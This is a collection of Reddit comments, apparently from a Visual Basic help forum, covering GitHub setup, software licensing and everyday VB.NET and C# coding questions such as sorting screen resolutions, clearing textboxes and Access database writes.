&gt;whenever you select a specific radio button - &gt; Handles grpAddon.TextChanged ?
I know that was probably part of the problem. Excuse my ignorance I guess but I don't know what to do for the event handler itself 
GitHub has its own application which is significantly easier to use to manage GitHub repositories. Since you already started the process with Visual Studio, before this process begins, you may have to navigate to your folder with the `.sln` file and delete the `.git` folder and any file which begin with `.git` it may have created. Anyway, to do this with GitHub Desktop: 1. Download and install [GitHub Desktop](https://desktop.github.com/). 2. Log in with your newly created GitHub account you mentioned above. 3. Click `File`, then click `New Repository...` 4. Give your repository a name. Usually the name of your solution is good. Since you have no other repositories yet, basically any name is good. 5. Click `Choose...` and navigate to the folder your `.sln` file is in and select that folder. 6. Set your git ignore to `VisualStudio`. Select or don't select a license. It's not required. `MIT License` is standard. 7. Click `Create Repository`, then click `Publish Repository` on the far right just below the menu bar. Simple. No weird hoops to go through like Visual Studio makes you go through.
Not particularly cold. I'd be using VB6 to write out a proof of concept for reference material as it would need to be ported to a lower level and faster cross platform language like C or C++. I have unique ideas for a distributed ledger that haven't been done before.
Let us know when you get a github link! Sounds interesting.
Hey man, so what you're talking about is the function '[addhandler](https://docs.microsoft.com/en-us/dotnet/visual-basic/language-reference/statements/addhandler-statement)dhandle'. Make two new functions to handle the mouse enter and leave events, then you can dynamically add them with: addhandler holdbox(i).mouseenter, addressof FUNCTION Where FUNCTION is the mouse enter function. Then repeat for mouse leave 
I don't think that's a built-in function. Right-Click on it and click **Definition**.
Is this for school homework? If not, there are better ways to do this. If this is school work, tell your teacher to go to hell for me.
I've tried using Git through Visual Studio itself like... once, and it was a bit of a challenge. The advantage is that Visual Studio is aware of where you are in your repository, and you can move back and forth through it from inside VS. I find the actual GitHub desktop app much more intuitive. You may wish to give it a try: https://desktop.github.com/ Once you fundamentally are comfortable with GitHub and how it works, it'll be much easier for you to try to contend with Visual Studio's integration with it. Eventually you will want to commit to GitHub every time you make changes, and you will end up referring back to GitHub to see what you did and when. Some advice: 1. Play with a folder that is NOT your only copy of your project until you know how to use source control. Make backups. Git controls what version of your software is actually in the folder, and you can undo your project if you aren't careful. In my case, I actually copy my code into my Git folder on my PC, the one I work with in Visual Studio is different. (On my tablet though, I work directly in my Git folder.) 2. Make sure you do NOT commit any passwords or 'secrets' to your GitHub repository. This requires you use good practices like not including passwords in your source code to begin with. ;) This is my project as an example: https://github.com/ocdtrekkie/HAController and you can see each time I committed changes here: https://github.com/ocdtrekkie/HAController/commits/master
I would maybe add a little explanation about license too, if the OP is unfamiliar. It's ideal for people to know what rights they sign away. ;) /u/LakeAire : If you post your source code on GitHub, anyone can view it, but technically, other people using your code is not legal at that point. In the United States, at least, you have a copyright to it simply because you wrote it. Generally you either want to allow people to use your code with conditions, so that they can do more than just look at it. The two most common are MIT and GPL-style licenses. The MIT license is a "permissive" license. It lets people do pretty much anything they want with your code... as long as they leave your license/credit intact. They can't claim they wrote your code. But they can include your code in their own software without any major requirements. The GPL license is a "copyleft" license, which is mostly the same in terms of people being able to use and include your software, except it requires that anyone who uses your code must also release their code that uses it with a GPL license as well. Which means people can't use your code inside a closed source product. I personally prefer MIT, because I don't like holding conditions over sharing my code. MIT and GPL are representative of the most common licenses out there, but there are many, and they fall into various amounts of similarity to those two.
unfortunately this is not school work. It would have been nice if we had learnt this, but the most complex thing we learnt how to do was use arrays. Yes I know.
Can we have more code to look at?
[GitHub link. Hope it works for you (it works for me but who knows what that means)](https://github.com/beingDevisor/SeniorProject) Thanks for all the help!! It means more to me than you think
[GitHub link. Hope it works for you (it works for me but who knows what that means)](https://github.com/beingDevisor/SeniorProject) I really appreciated the license explanation. It makes a lot of sense and I somewhat know what I'm doing now. Thank you!!
[GitHub link. Hope it works for you (it works for me but who knows what that means)](https://github.com/beingDevisor/SeniorProject)
From your example, I assume commit means to update your work in progress on GitHub? that makes sense. When I uploaded my senior project, I had no idea what the commit button did lol. [Here's my GitHub link. Hope it works for you (it works for me but who knows what that means)](https://github.com/beingDevisor/SeniorProject) Did I do it right, do you think?
[Hey guys, I learned how to use GitHub thanks to the wonderful commenters here! Here's a GitHub link for you. Much better than Google Drive .rar downloads](https://github.com/beingDevisor/SeniorProject)
Looks pretty good! Yes, each time you submit changes to your code to a Git repository (GitHub is the most popular place to host Git repositories, but Git is actually open source. Anyways...), you are "committing" those changes. The cool thing is you can go back and see what you did, to multiple files, each step along the way. And if you break something, you can undo a commit (or "revert" it), and be back to a working project. You can also work on code in separate branches and then merge them into the main project when you're ready. There's a lot you can do with it. A lot of it is meant for collaboration between multiple developers, but it's very handy for individual coders too. If I need to know why I made a code change, I can even use the "blame" feature on GitHub to figure out which commits (by who), changed the line of code I'm looking at. If my commit description was good, I'll probably understand why I did it, even if I didn't explicitly comment the code itself. It's always personally interesting to look at similar code. For example, your text entry handler here: https://github.com/beingDevisor/SeniorProject/blob/master/Form1.vb#L25 shares some similar code with mine here: https://github.com/ocdtrekkie/HAController/blob/master/Form1.vb#L208 though I had to move my code that handles entered commands into KeyUp instead of KeyDown. I wondered why, and then I did Blame: https://github.com/ocdtrekkie/HAController/blame/master/Form1.vb#L208 which shows me which commits modified which lines. As the case is, I changed mine because of a hardware LCD display I'm outputting to in my car: https://github.com/ocdtrekkie/HAController/commit/763d544a44eea8fec147bafc6fb002dc858eeccb But then, I realized the SuppressKeyPress function only works in KeyDown, which is why I had to move that back, here: https://github.com/ocdtrekkie/HAController/commit/698eea675140bb3706113054bb88bc0188151171 Other random musings: You look for Keys.Enter and I look for Keys.Return and I have literally no idea if there's a difference between the two.
I've been trying to add some of my older projects to GitHub as well, but I ran across a problem. If the file name that houses my solution &amp; project stuff has spaces, I'm unable to create a repo for it that recognizes my solution and everything. [Here on my GitHub profile](https://github.com/beingDevisor) I currently have two projects; my SeniorProject which seems to be functioning properly, and my TextAdventure3.0 which was originally titled "Text Adventure 3.0" but I tried changing the file name to one without spaces and it didn't seem to help. Any help?
Well dang. That's pretty neat! I do have some other questions though lol 1. What benefit does using branches have if I plan on working on my projects solo? 2. The GitHub desktop application is somewhat confusing. How do I go about making a new commit if I change my code? 3. As seen on my profile [here](https://github.com/beingDevisor), I was able to get GitHub to recognize my Vb solution with my SeniorProject, but not with my TextAdventure3.0 project. TextAdventure3.0 was originally named 'Text Adventure 3.0' but I removed the spaces because I couldn't get GitHub to recognize my senior project until I got rid of the spaces in the file name. However, it isn't working with TextAdventure3.0. Do you know why that might be? Thank you for all your help! You've made understanding this new system a great deal easier.
1. I rarely use branches in personal projects, but have if I want to save/store a commit that I know is broken and unfinished. It leaves my main branch in a working state, and I can merge the changes in the branch back to my main project later. 2. If you make changes to the code that's in the folder associated with your GitHub repo on your computer, the Changes column will fill with a list of the files that you've changed (and you can see what the changes are when you click on each file). Then you just give it a description/summary (and a comment, if you like) and click "Commit to master". One of the buttons on the grey bar at the top should then give you an option to push the commits you've made to GitHub. After that, you should see that commit and it's changes on the GitHub website. 3. TextAdventure doesn't have any code in it yet! GitHub marks what type of project you have based on the contents of the code files it detects in it. You'll notice if you click on the purple bar here: https://github.com/beingDevisor/SeniorProject it says your project is 100% Visual Basic. On mine, here, it says it's 99.3% Visual Basic, and 0.7% Batchfile: https://github.com/ocdtrekkie/HAController GitHub picks the most prevalent code language in your project to mark as the type of project it is. I maybe would avoid putting periods in your project names too. Might be the problem there.
One of the things you probably want to look at doing in the future, particularly if you end up expanding this (my assistant is for my daily use, so I regularly improve it) rather than just submitting for the grade, is decreasing code replication. Any time you have to do something repeatedly, there is probably a better way to do it. For instance this function: https://msdn.microsoft.com/en-us/library/6cd3f6w1(v=vs.90).aspx can make lines like this: https://github.com/beingDevisor/SeniorProject/blob/master/Form1.vb#L72 or this: https://github.com/beingDevisor/SeniorProject/blob/master/Form1.vb#L81 much shorter. L72 could be "If IsNumeric(strInput.Chars(0)) Then" for example. The other thing you'll likely find quite exciting is Select Case: https://docs.microsoft.com/en-us/dotnet/visual-basic/language-reference/statements/select-case-statement#example which works on not just integers like the example, but string as well. Sections like "If strSign = "-" Then" lines could be entirely replaced with Select Case strSign, and then where each case was a string for the operator like Case "+".
probably GetElementById("commit") is returning null/nothing, and your call to InvokeMember("click") is actually what is throwing the object required error. If you break your code into a few lines you would be able to tell what is actually returning null, but it is either the document, or the element you are getting, and most likely it is the latter.
Thanks heaps :) Gt the answer on another forum, I was so bloody stressed all day and it was just that stupid line. Much appreciated bud
You can always copy in the .sln file and project folder to the newly created GitHub folder.
I recently built a prefix tree class, with insertion and search methods, in order to do this. It was a good exercise!
The IsNumeric looks like it'll make coding a lot easier. Thanks for the tip! I remember learning about Select Case way back in sophomore year when I took computer programming 1, but I couldn't remember how to do it lol. Thank you so much!
I messed around with stuff a little more and just found that moving my project to the created GitHub file works (for TextAdventure3). Now that I type it out, it sounds so simple lol, but I couldn't figure it out. Thanks so much! You've been a huge help.
Glad you got it figured out! It can be kinda hard to 'see' what someone's doing over a Reddit comment. ;)
The .NET class library is insanely deep in terms of stuff it can do built-in. Sometimes I just wonder "hey, is there a .NET function to do that" and go searching around on the Internet, and find out there is. Microsoft's documentation can be a bit hard to find on it, but it's pretty good once you get in there.
The documentation isn't the greatest, but its contents sure are nifty!
Fixed my issue! Thanks!
Any other questions you have in the future about VB, GitHub, or what I did in my project, lemme know! Your code and mine have a bit in common, so I'd be super curious if there was a new feature you came up with or the like. And of course, my project's MIT licensed, so feel free to borrow anything that interests you out of it, or if you're curious about how or why I did something, let me know. (There's actually several really easy ways to crash mine, for what it's worth, do not take how I wrote my project to be the end-all best way to do things. ...It's not.)
This is a visual basic sub. Try /r/vba or /r/excel
Alright im gonna write you a good code later but here is what i came up with on the spot. (Timer1) If Form2.CheckBox1.Checked = True then Timer1.stop Me.minimize (Timer2) If Form2.CheckBox1.Checked = False then Timer2.start Me.show 
You can't stop the date from being selected in the stock WinForms picker. You have a few choices; * Use the WPF version of the DatePicker, and host it in your WinForms app: https://stackoverflow.com/questions/27319417/disable-some-dates-in-datetimepicker-winform-c-sharp/27319756#27319756 * Build your own picker that has that feature. * Allow them to select the date with the stock selector, and then alert them that it's not available.
Are you asking how can you block out dates that were already taken? If so, then you need to store the dates that are taken and use that list to block acceptable dates. Use an array, database, access database, etc. 
I believe the OP want's to grey out, or otherwise disable, the dates in the calendar control that drops down from the Picker when selected, so that they user can't select that date at all. 
Oh I see. And yeah.... I don't know how to do that. 
This is my problem. :( I still can't fix it
Not an audiobook, persay. But if you've got time to check out [Kevin Drumm](https://www.youtube.com/channel/UCSX3MR0gnKDxyXAyljWzm0Q/playlists)'s video series, he does great tutorials on computer science concepts with VB.net implementations. You can go to http://www.listentoyoutube.com/ and convert his videos into MP3s to listen to on the go, but you'll miss the visual presentation. Crash Course has a great series on [computer science](https://www.youtube.com/watch?v=tpIctyqH29Q&amp;list=PL8dPuuaLjXtNlUrzyH5r6jN9ulIgZBpdo), too. Might be worth checking out for the same reason, minus the VB.net implementation. 
Everything I know about VB I learned on the job. 2 things I think are important: * Threads, passing arguments to them. * Datasets with Datagridviews, SQL, constraints and Databases in general. * 
Hey man, did you have a chance to do the good code? Thanks for your help :) 
Havent looked at it yet, Perhaps you could make some small mods to my code an it wil work
Instead of startgameloop being in **.Load**, it should go in **.Shown**. Private Sub form1_Load(sender As Object, e As EventArgs) Handles Me.Load 'Me.Show() 'Me.Focus() 'Initialize graphics objects g = Me.CreateGraphics bb = New Bitmap(resWidth, ResHieght) bmpTile = New Bitmap(My.Resources.grass) bmpToon = New Bitmap(My.Resources.Untitled) End Sub Private Sub Form1_Shown(sender As Object, e As EventArgs) Handles Me.Shown startgameloop() End Sub ...or create a thread for Startgameloop Dim thrd As New Threading.Thread(AddressOf startgameloop) thrd.Start() 
they have an [API](https://coinmarketcap.com/api/) but it looks like it's rpc, i just switched my program to c# because I couldn't find a way to RPC with vb net
I’m in the same boat. I am doing this as a hobby so just fumbling my way through my project. I would like a 201, 301 book for sure. 
The sample demonstrates how to use MS Word spell check in Visual Basic https://www.youtube.com/watch?v=v0ClVXko7Bk
I figured this out. No need for further help.
Post your solution to help others? 
 Dim cControl As Control For Each cControl {Container Name}.Controls If (TypeOf cControl Is TextBox) Then cControl.Text = "" End If Next cControl
While a timer might be a relatively simple way of achieving it, generating a [custom event handler](https://www.codeproject.com/Articles/229122/Add-Custom-Event-To-A-Class-in-VB-Net) is another way to go about it. 
This was really helpful! Thank you!! 
https://docs.microsoft.com/en-us/dotnet/visual-basic/programming-guide/language-features/strings/how-to-convert-strings-into-an-array-of-bytes
This does not work. As that is Text to bytes. I already have it in binary form "1010101010" But i need to put all of the binary into a Byte()
If you have a string with "1010101", that's not binary form, that's a text string representation of a binary number. It probably would be easier to help you if you gave us the format of the input you have and the format of the final output you need.
If you absolutely must use a "binary string" representation, you can get bytes from it like this: Sub Main Dim n = toByte("11111111") Console.WriteLine(n) ' prints 255 End Sub Shared Function ToByte(s As String) As Byte Dim n As Byte = 0 For Each c In s n = n * Cbyte(2) + CByte((AscW(c) - 48)) Next Return n End Function 
No /u/abootn is correct even if your representation is a binary sequence it currently is a string and will need to be converted.
That's useful, but if you have a form with many GroupBoxes, then it can still get annoying to go through each GroupBox. If you have Panels, SplitPanels, and more formatting your form, it can get pretty nightmarish to figure out. Instead, you can use a function like this: Public Function GetAllControls(ByVal Controls As IList) As List(Of Control) Dim ctls As New List(Of Control) For Each ctl As Control In Controls ctls.Add(ctl) Dim children = GetAllControls(ctl.Controls) ' Get child controls ctls.AddRange(children) ' ...and add them to the list Next Return ctls End Function To get *all* the controls on the form (or any other container). You can then do the same thing as in the video: For Each ctl as Control in GetAllControls(Me.Controls) If TypeOf ctl is TextBox Then ... End If Next This will give you all the controls in the Form, no matter how deeply inside another container they're nested.
You want to iterate a string of 1/0? Use Mid$() to get each byte
Included with Visual Studio under Tools is`"Depends` which will give you all pulic function names, but their parameters are up to you to figure out
Thanks
Add a reference to it in your project and the IMPORT it into your class. You should then be able to declare a variable and see what is under the hood. If it is a .net DLL look at dotPeek, a free tool you can download to explore anything made in .Net
Odd question for a visual basic sub, what programming knowledge/experience do you have?
Very little :(
This is either a job interview or a class assignment. You have not even tried, nor did you read the rules. Please do some basic online learning before trying to get people to do your work for you.
I already tried but I doors not do what I need it to do. and I’m asking for help not for someone to do the job lol
Lets see the code you’ve written and I can try to give you pointers. 
string name; float many; //int quantity; string type; double choco = 0; string wrapping; float wrap; float totalchoc = 0; float totalwrap = 0; float total = 0; Console.WriteLine("What is your name?"); name = (Console.ReadLine()); Console.WriteLine("Welcome, nice to meet you! " + name); //Start: Console.WriteLine("How Many Boxes?"); many = (Console.Read()); Console.WriteLine("What type of chocolates you want? mint, white or swiss?"); type =double.Parse(Console.Read()); if (type == "mint") { choco = 12; totalchoc = choco * many; } else if (type == "white") { choco = 15; totalchoc = choco * many; } else if (type == "swiss") { choco = 20; totalchoc = choco * many; } Console.Read(); //if (type == "o") //else if(type != "") //{ // Console.WriteLine("Wrong entry! please try again."); //goto Start; //} //Console.ReadLine(); //Console.Write(quantity); //begin: // Console.WriteLine("How many boxes do you want?"); //many = Console.Read(); // totalchoc = choco * many; // Console.ReadLine(); Console.WriteLine("What Wrapping type? basic, individual or special?"); wrapping = (Console.ReadLine()); if (wrapping == "basic") { wrap = 5; //totalchoc = choco * quantity; totalwrap = wrap * many; total = totalchoc + totalwrap; } else if (wrapping == "individual") { wrap = 10; //totalchoc = choco * quantity; totalwrap = wrap * many; total = totalchoc + totalwrap; } else if (wrapping == "special") { wrap = 18; //totalchoc = choco * quantity; totalwrap = wrap * many; total = totalchoc + totalwrap; } Console.ReadLine(); //else if (type != "") //{ // Console.WriteLine("Wrong entry! please try again."); // //goto begin; //} Console.WriteLine("Receipt"); Console.WriteLine("Quantity:" + many); Console.WriteLine("Total Chocolate Cost:" + totalchoc); Console.WriteLine("Total Wrapping Cost:" + totalwrap); Console.WriteLine("Total Amount to Pay:" + total); Console.Read(); }
Thanks for the tip
 string name; double many = 0; //int quantity; string type; double choco = 0; string wrapping; float wrap; double totalchoc = 0; double totalwrap = 0; double total = 0; Console.WriteLine("What is your name?"); name = (Console.ReadLine()); Console.WriteLine("Welcome, nice to meet you! " + name); //Start: Console.WriteLine("How Many Boxes?"); many = (Console.Read()); Console.WriteLine("What type of chocolates you want? mint, white or swiss?"); type = (Console.ReadLine()); if (type == "mint") { choco = 12; totalchoc = choco * many; } else if (type == "white") { choco = 15; totalchoc = choco * many; } else if (type == "swiss") { choco = 20; totalchoc = choco * many; } Console.Read(); //if (type == "o") //else if(type != "") //{ // Console.WriteLine("Wrong entry! please try again."); //goto Start; //} //Console.ReadLine(); //Console.Write(quantity); //begin: // Console.WriteLine("How many boxes do you want?"); //many = Console.Read(); // totalchoc = choco * many; // Console.ReadLine(); Console.WriteLine("What Wrapping type? basic, individual or special?"); wrapping = (Console.ReadLine()); if (wrapping == "basic") { wrap = 5; //totalchoc = choco * quantity; totalwrap = wrap * many; total = totalchoc + totalwrap; } else if (wrapping == "individual") { wrap = 10; //totalchoc = choco * quantity; totalwrap = wrap * many; total = totalchoc + totalwrap; } else if (wrapping == "special") { wrap = 18; //totalchoc = choco * quantity; totalwrap = wrap * many; total = totalchoc + totalwrap; } Console.ReadLine(); //else if (type != "") //{ // Console.WriteLine("Wrong entry! please try again."); // //goto begin; //} Console.WriteLine("Receipt"); Console.WriteLine("Quantity:" + many); Console.WriteLine("Total Chocolate Cost:" + totalchoc); Console.WriteLine("Total Wrapping Cost:" + totalwrap); Console.WriteLine("Total Amount to Pay:" + total); Console.Read();
Here's some sample code for sorting the resolutions by width (provided that they are originally Strings): Public Sub Main() Dim sizes As String() = { "640 x 480", "720 x 480", "720 x 576", "800 x 600", "1024 x 768", "1152 x 864", "1176 x 664", "1280 x 720", "1280 x 768", "1280 x 800", "1280 x 960", "1280 x 1024", "1360 x 768", "1366 x 768", "1600 x 900", "1600 x 1024", "1680 x 1050", "1768 x 992", "1920 x 1080", "1440 x 900" } Dim sizesList As New System.Collections.Generic.List(Of String) sizesList.AddRange(sizes) ' Sort using width sizesList.Sort(Function(x As String, y As String) Return GetWidth(x).compareTo(GetWidth(y)) End Function) For Each resolution As String In sizesList Console.WriteLine(resolution) Next End Sub Private Function GetWidth(resolution As String) As Integer Return Integer.Parse(resolution.Split(" ")(0)) End Function 
Thanks but that won't work because it's a 1-dimensional array. I need to be able to add resolutions dynamically, not manually.
What is the structure/data type of the declared list? 
 ' Initialise list Dim resolutionsList As New System.Collections.Generic.List(Of String) resolutionsList.AddRange(resolutions) ' Sort using width (and height if necessary) resolutionsList.Sort(Function(x As String, y As String) ' Compare width Dim widthCompareResult As Integer = GetWidth(x).compareTo(GetWidth(y)) ' Width is equal - so compare height If widthCompareResult = 0 Then Return GetHeight(x).compareTo(GetHeight(y)) End If Return widthCompareResult End Function) ' Display the result For Each resolution As String In resolutionsList Console.WriteLine(resolution) Next Private Function GetWidth(resolution As String) As Integer Return Integer.Parse(resolution.Split("x")(0)) End Function Private Function GetHeight(resolution As String) As Integer Return Integer.Parse(resolution.Split("x")(1)) End Function
List(Of String) All my resolutions get added to this list in a For Each statement. Dim Resolutions As New List(Of String) For Each result In resResults Resolution.Add(result("HorizontalResolution") &amp; " x " &amp; result("VerticalResolution")) Next I want the output to be 'Width x Height', then I want to sort that list. I want to sort the widths and if two widths being compared are the same, I want it to compare the heights. So if it adds to the list like: 1600 x 900 1920 x 1080 800 x 600 1280 x 1024 1366 x 768 1280 x 768 1280 x 960 I want it to sort them so they are: 800 x 600 1280 x 768 1280 x 960 1280 x 1024 1366 x 768 1600 x 900 1920 x 1080
Method where you convert each resolution to a string before sorting: ' Initialisation ' After this, resolutions should be in format Width x Height Dim Resolutions As New List(Of String) For Each result In resResults Resolution.Add(result("HorizontalResolution") &amp; " x " &amp; result("VerticalResolution")) Next ' Then, sort using width (and height if necessary) resolutionsList.Sort(Function(x As String, y As String) ' Compare width Dim widthCompareResult As Integer = GetWidth(x).compareTo(GetWidth(y)) ' Width is equal - so compare height If widthCompareResult = 0 Then Return GetHeight(x).compareTo(GetHeight(y)) End If Return widthCompareResult End Function) ' Display the result For Each resolution As String In resolutionsList Console.WriteLine(resolution) Next ' Put this outside Private Function GetWidth(resolution As String) As Integer Return Integer.Parse(resolution.Split("x")(0)) End Function Private Function GetHeight(resolution As String) As Integer Return Integer.Parse(resolution.Split("x")(1)) End Function You could probably find an easier and simpler way to extract the resolutions out of resResults directly. 
Is this tested? And if I'm dealing with numbers shouldn't I be using Integer.Parse?
Looking at the code there is a bunch of syntax errors. Was this converted from C# because VB does not support in line comments.
Not working. Exception: 'Input string was not in the correct format.' It is for: Private Function GetHeight.
I think the index problem may be that you're splitting on space and I'm splitting on `x`in the sample code above. There's documentation for list sorting [here](https://msdn.microsoft.com/en-us/library/w56d4y5z(v=vs.110).aspx?cs-save-lang=1&amp;cs-lang=vb#code-snippet-2). 
Thank you, I appreciate it.
Try multiplying each out first, to get the max pixel count of each. Then use that max_pixel_count to sort the list and simply display the 640 x 480 to the user... Does this make sense?
Try inserting the text first, then apply the font/paragraph formatting to the paragraph range.
would you happen to have rough code on how to do that? I'm normally halfway decent at coding but damn if this one hasn't been Everest to me for no good reason
Sorry, I re-read your code and realized that you're already doing that. Another thing I'd suggest is that you reset the font properties for each new paragraph you're creating, because otherwise it'll inherit the direct formatting from the previous one. Before inserting the text in your new paragraph, call .Range.Font.Reset(), which should remove the characteristics that were inherited from the previous paragraph.
No, I got the issue solved but I'm always open to new and creative ideas!
So you were right, but that led to another interesting issue- whenever I enter either multiple lines as the text when I call the sub, or if I add like a vbCrLF type thing to the sub itself (to basically just add the appropriate "enter key" after each paragraph entry) it will change the color back. Like if I don't have it hitting enter it works fine, as soon as multi line comes into play it reverts back to black. 
Basically, 640x480=307,200. So you create an array or collection with a custom type, one value holds the pixel count (307,200), the other the screen dimensions (640x480). You sort the array or collection based on the pixel count. Then load the array/collection into your listbox or what have you displaying the dimension data. This way you can adapt to whatever monitor is connected, display the screen sizes in smallest to largest order, or vice versa.
Wow, that's really cool. But as far as I know only 1-dimensional arrays can be sorted together. Example: Array.Sort(array1, array2)
a .net program isn't a spreadsheet, so there's no way there's going to be an exact equiv. there's HTML and XML parsing libraries that might help, but it's going to be easier if you find an API that gives machine readable data in well formed xml or json or even CSV. 
Appreciate your answer, thank you.
Ultimately the best way to deal with the use of multiple styles in a Word document is to create the styles you need and programmatically manipulate the Style object. Otherwise you'll be fighting the weird behaviour that you're seeing when using direct formatting.
As /u/redditsdeadcanary mentioned, one of the ways to solve this would be to create a custom type and sort it that way. Public Class Res Implements IComparable Public Property width As Integer = 0 Public Property height As Integer = 0 ' Constructor for Res Public Sub New(width As String, height As String) Me._width = Integer.Parse(width) Me._height = Integer.Parse(height) End Sub ' Get pixel count Public Function GetPixelCount() As Integer Return Me._width * Me._height End Function ' Compare 2 Res objects ' Copied and adapted from: ' https://msdn.microsoft.com/en-us/library/system.icomparable(v=vs.110).aspx Public Overloads Function CompareTo(obj As Object) As Integer Implements IComparable.CompareTo If obj Is Nothing Then Return 1 Dim otherRes As Res = TryCast(obj, Res) If otherRes IsNot Nothing Then Return Me.GetPixelCount().CompareTo(otherRes.GetPixelCount()) Else Throw New ArgumentException("Object is not a Res") End If End Function ' Override the ToString method, so our Res object can be formatted nicely ' Adapted from ' https://msdn.microsoft.com/en-us/library/system.object.tostring(v=vs.110).aspx?cs-save-lang=1&amp;cs-lang=vb#code-snippet-4 Public Overrides Function ToString() As String Return CStr(Me._width &amp; " x " &amp; Me._height) End Function End Class Public Sub Main() Dim resolutions As String() = { "1152 x 864", "720 x 576", "720 x 480", "640 x 480", "800 x 600", "1024 x 768", "2 x 1", "1 x 2" } Dim resolutionsList As New System.Collections.Generic.List(Of Res) For Each res In resolutions resolutionsList.Add(new Res(res.Split("x")(0), res.Split("x")(1))) Next ' Sort using width resolutionsList.Sort() For Each resolution As Res In resolutionsList Console.WriteLine(resolution) Next End Sub And you would add to the list like so, again assuming that result('...') are Strings: Dim resolutionsList As New System.Collections.Generic.List(Of Res) For Each result In resResults Resolution.Add(new Res(result("HorizontalResolution"), result("VerticalResolution"))) Next Note, note that there are cases where the width may appear to be not in order (it also depends on the order that you insert the items and the sorting implementation). However, I suppose that it's possible to just modify the sort function slightly if you wish to sort by pixel count. Function(x As String, y As String) ' Compare width * height Return (GetWidth(x) * GetHeight(x)).compareTo(GetWidth(y) * GetHeight(y)) End Function 
Those two things are what i need, also a job in VB.. ive spent over 10 years doing VB, but never touched a databse and im sure my method of getting data in and out of threads is not recommended.
It's pretty hard to help without a code sample and some sort of idea about the data structure.
you need to use TIMESPAN function. roughly this: (untested) dim Diff as Timespan dim Time1 as date = now dim Time2 as date =(now-72HH) Diff = time1-time2 Msgbox(Diff) i'll go test /code it and come back.. but thats a rough guide to get you started. 
This works by you attempting, submitting code, and us telling you where you went wrong. Otherwise people will think you want them to do your work for you.
&gt;Homework questions are tolerated, please be specific about the question as much a possible. Asking us to write it for you is not going to happen. We also reserve the right to not answer if we think you are just not trying.
first part is just math. not sure what you've tried that sin't working but it seem pretty straightforward. 2nd part... not sure what you mean by "return the equation", functions return values. 
Is nobody willing to do any work anymore? I am getting tired of people just wanting answers instead of spending time to figure it out. Here is how to calculate variable points in a trendline http://classroom.synonym.com/calculate-trendline-2709.html Here is how the charting tool works. http://www.visual-basic-tutorials.com/display-data-as-charts-and-graph-in-visual-basic.html 
Definitely the easiest way. You're using an established template. Create and save the styles in the template, then simply apply styles to the paragraph.
Nobody is willing to do their own homework. I feel like the mods should just ban people who come asking for their homework to be done for them.
loadrand has an error when the user enters any number above 10000 because MyArray only has 10000 as the highest element. Command2_Click has an error because it does use any values in MyArray and also does not sum the values. The error is using 'a', it is always zero. Try this and continue: Public MyArray(10000) As Long Public LimArray As Long Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load End Sub Sub loadRand(limAr As Long) Dim i As Long For i = 1 To limAr MyArray(i) = 10000 * Rnd() Next i LimArray = limAr End Sub Private Sub command1_click() Dim n As Long n = Val(InputBox("enter the size less than 10,001", "loadArray")) loadRand(n) MsgBox("done") MsgBox(MyArray(n)) End Sub Private Sub loadRandom_Click() End Sub Private Sub Command2_Click() Dim sum As Long Dim avg As Long For i = 1 To LimArray sum = sum + MyArray(i) Next avg = sum / LimArray MsgBox(avg) End Sub 
I'm getting a "User-defined type not defined", highlighting the third line (Private Sub Form1_Load(sender As Object, e As ... ) Is it because I'm missing the msdn library (Not sure if I have it) or something left unchecked with the components?
you'll need to use WinDbg to put a breakpoint for calls to CoCreateInstance, then write over the particular CALL with NOPs. 
you couldn't find a single vb+access database tutorial? 
I found some, but none of them worked. I can post my code later when I get home if you want.
the tutorial followed to the letter didn't work?
No... I copied and pasted the code, changed the database location, column names, variables, etc and it didn't work. I have the program already read information from the database, but I want it to write to it too. Writing information is the only problem I'm having.
Sending info to an access table? Adding records?
Remove the subroutine Form1_Load. You aren't using it.
Worked. Thanks!
If you're wanting to import a file from your computer, you need to click the radio button next to Local Resource then Import. If it's a file already in that list, I would think the import button would work if you selected anything other than none.
The local resource doesn't work either. 
Il spy. Its a decompiler for .Net applications that will let you have a look at the code. https://github.com/icsharpcode/ILSpy
Not a .NET application though, so this won't help.
Just so anyone curious comes across this, I solved it myself. Code below. For Each row As DataRow In dtPairsTable.Rows firstPair = Split(row("Pair"), "_") If firstPair(0) = "BTC" Then For Each row2 As DataRow In dtPairsTable.Rows secondPair = Split(row2("Pair"), "_") If secondPair(0) = firstPair(1) Then For Each row3 As DataRow In dtPairsTable.Rows thirdPair = Split(row3("Pair"), "_") If thirdPair(1) = secondPair(1) Then ' Code goes here! i = i + 1 End If Application.DoEvents() Next End If ' Next End If ' Next
You could try strings. If you are on Windows you will have to download the exe first, most linux distros should have it preinstalled. Just look for long strings or check the output with some regex.
VBS, VB or VB.NET?
I'm using Visual basic 6
VB died ages ago. You should move on to VB.NET. 
Well it's just a school homework so it doesn't really matter. Does the syntax differ much from VB.net?
I don't know for sure but I would prefer not to learn VB. I had a hard time moving from VB to .NET and I remember reading books that made me furious. Maybe I was just a bad programmer at that time and .NET was revolutionary in the way an application was build. VB will give you fundamentals but lots of things has changed. I wouldn't know how to sort a list in VB. In .NET I would use MyList.Sort(Func(x, y) x.CompareTo(y)) ...that's for sure not possible in VB. 
30 years programming experience here, mostly in VB. You can make amazing games in VB. As long as they're not frame rate critical. In other words, if it's a game where you just have to click on things with little to no animation going on on the screen, then VB is just fine. As soon as you get into needing to animate things, you're going to get a massive dive in frame rate. I'm currently working on an [RTS game](https://imgur.com/s5a7gH4) in VB. The catch is, it's turn-based, so nothing needs to be animated. You just draw the whole map once for each turn, make a cursor selection box blink on a tile, and that's it. You could probably make a pretty good Civilization 1 clone in VB, if you're skilled enough. And that game sold millions back in the day. Imagination is the key. Bottom line, If you can design a game that's fun and interesting without needing animation in the graphics, then VB is fine. If not, go with C#, or C++. You're definitely not going to be able to make a first person shooter or anything.
The class must have a language you are supposed to use, right?
2D Side scrollers do involve a lot of sprite animation (if they're gonna be fun). I don't think you could get a proper frame rate on something like that. I'm not saying it's not possible. But it might be very difficult for a beginner. 
Declaring variables isn't until chapter 18?!?!?
Its always smart to close and reopen a connection. This tells the ADO object to clear the connection and recover resources. By doing this you will limit timeouts in authentication reconnect after 15 minutes of inactivity.
I recall there being a timeout property on the connection. Something like oPT.Connection.Timeout = &lt;# seconds&gt; or maybe .ConnectionTimeout. What about a variation of this? myConnection.ConnectionString = "Persist Security Info=False;Integrated Security=SSPI;database=northwind;server=mySQLServer;Connect **Timeout=60**" 
Thanks for this - really useful reference!
If you're using WinForms, maybe try `sender.Text`? 
Nice! Never know about the null condition operator.
